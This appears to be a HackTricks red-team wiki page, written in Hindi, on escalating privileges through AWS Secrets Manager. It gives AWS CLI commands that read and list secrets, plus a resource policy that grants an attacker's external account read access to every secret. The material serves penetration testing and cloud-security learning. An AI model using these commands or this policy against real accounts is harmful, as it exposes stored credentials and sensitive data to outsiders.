AWS - Secrets Manager Privesc

Tip

सीखें और अभ्यास करें AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
सीखें और अभ्यास करें GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
सीखें और अभ्यास करें Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

Secrets Manager

secrets manager के बारे में अधिक जानकारी के लिए देखें:

AWS - Secrets Manager Enum

secretsmanager:GetSecretValue

इस permission वाले attacker AWS Secretsmanager में किसी secret के अंदर सहेजा गया मान प्राप्त कर सकते हैं।

aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Potential Impact: AWS secrets manager service के अंदर उच्च संवेदनशील डेटा तक पहुँच।

Warning

ध्यान दें कि भले ही किसी के पास secretsmanager:BatchGetSecretValue permission हो, एक attacker को संवेदनशील secrets प्राप्त करने के लिए secretsmanager:GetSecretValue की भी आवश्यकता होगी।

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

पिछली permissions के साथ यह संभव है कि अन्य principals/accounts (even external) को secret तक पहुँच प्रदान की जा सके। ध्यान रहें कि KMS key से एन्क्रिप्ट की गई secrets को पढ़ने के लिए user के पास KMS key का भी access होना आवश्यक है (अधिक जानकारी के लिए KMS Enum page).

aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<attackers_account>:root"
},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*"
}
]
}

Tip

सीखें और अभ्यास करें AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
सीखें और अभ्यास करें GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
सीखें और अभ्यास करें Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें